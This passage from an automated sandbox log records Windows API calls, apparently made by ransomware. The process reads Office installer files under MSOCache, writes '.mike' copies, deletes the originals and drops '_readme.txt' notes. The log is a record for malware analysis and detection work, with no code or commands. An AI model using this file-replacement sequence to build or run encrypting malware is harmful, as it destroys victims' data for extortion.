lpOldMode=0x2af074) returned 1 [0040.493] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.493] GetFileType (hFile=0x264) returned 0x1 [0040.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0040.494] GetFileType (hFile=0x264) returned 0x1 [0040.494] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af104*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af104*=0) returned 0x0 [0040.494] ReadFile (in: hFile=0x264, lpBuffer=0x211b944, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af110, lpOverlapped=0x0 | out: lpBuffer=0x211b944*, lpNumberOfBytesRead=0x2af110*=0x73c, lpOverlapped=0x0) returned 1 [0040.511] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb90, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0040.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.511] GetFileType (hFile=0x264) returned 0x1 [0040.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0040.511] GetFileType (hFile=0x264) returned 0x1 [0040.511] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x220 [0040.511] WriteFile (in: hFile=0x264, lpBuffer=0x2121350*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2af104, lpOverlapped=0x0 | out: lpBuffer=0x2121350*, lpNumberOfBytesWritten=0x2af104*=0x740, lpOverlapped=0x0) returned 1 [0040.511] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0040.511] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.512] GetFileType (hFile=0x264) returned 0x1 [0040.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af088) returned 1 [0040.512] GetFileType (hFile=0x264) returned 0x1 [0040.513] WriteFile (in: hFile=0x264, lpBuffer=0x2124578*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af134, lpOverlapped=0x0 | out: lpBuffer=0x2124578*, lpNumberOfBytesWritten=0x2af134*=0x20c, lpOverlapped=0x0) returned 1 [0040.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.513] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe256b020, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe256b020, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2591180, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x960)) returned 1 [0040.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike", lpFilePart=0x0) returned 0x4d [0040.513] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.513] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2125cf4 | out: lpFileInformation=0x2125cf4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe256b020, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe256b020, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2591180, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x960)) returned 1 [0040.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.513] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aeca0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.513] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0040.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed28, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.514] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0040.514] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed20, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.514] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0040.514] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1fc | out: lpFileInformation=0x2af1fc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.515] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0040.515] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecfc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.515] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aebbc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt", lpFilePart=0x0) returned 0x4a [0040.515] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0b0) returned 1 [0040.515] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0040.515] GetFileType (hFile=0x264) returned 0x1 [0040.516] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ac) returned 1 [0040.516] GetFileType (hFile=0x264) returned 0x1 [0040.516] WriteFile (in: hFile=0x264, lpBuffer=0x21279d8*, nNumberOfBytesToWrite=0x45e, lpNumberOfBytesWritten=0x2af148, lpOverlapped=0x0 | out: lpBuffer=0x21279d8*, lpNumberOfBytesWritten=0x2af148*=0x45e, lpOverlapped=0x0) returned 1 [0040.517] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.517] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.517] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.517] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe256b020, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2591180, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe256b020, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2591180, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0040.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0040.517] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2544ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2544ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2544ec0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x6f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.xml.mike", cAlternateFileName="INFOPA~1.MIK")) returned 1 [0040.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe256b020, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe256b020, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2591180, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x960, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml.mike", cAlternateFileName="SETUPX~1.MIK")) returned 1 [0040.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2544ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2544ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe25b72e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0040.518] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2544ec0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2544ec0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe25b72e0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0040.518] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.518] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.518] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\.", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.518] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0040.518] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0040.518] CoTaskMemFree (pv=0x4fe370) [0040.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aecf8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0040.519] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed6c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.519] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0040.519] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0040.519] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", nBufferLength=0x105, lpBuffer=0x2aed10, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\", lpFilePart=0x0) returned 0x3f [0040.519] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0040.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x0, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0040.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0040.519] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0040.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0040.520] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.520] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0040.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.521] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af200) returned 1 [0040.521] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.521] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.521] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af164) returned 1 [0040.521] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0040.565] GetFileType (hFile=0x264) returned 0x1 [0040.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af160) returned 1 [0040.565] GetFileType (hFile=0x264) returned 0x1 [0040.565] CloseHandle (hObject=0x264) returned 1 [0040.565] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aecf4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.565] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.565] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aeca4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0040.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1f8) returned 1 [0040.565] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214 | out: lpFreeBytesAvailableToCaller=0x2af224, lpTotalNumberOfBytes=0x2af21c, lpTotalNumberOfFreeBytes=0x2af214) returned 1 [0040.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1f4) returned 1 [0040.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.566] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x212cd40 | out: lpFileInformation=0x212cd40*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861)) returned 1 [0040.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1c4) returned 1 [0040.566] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x2aed1c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0040.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1c8) returned 1 [0040.566] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all 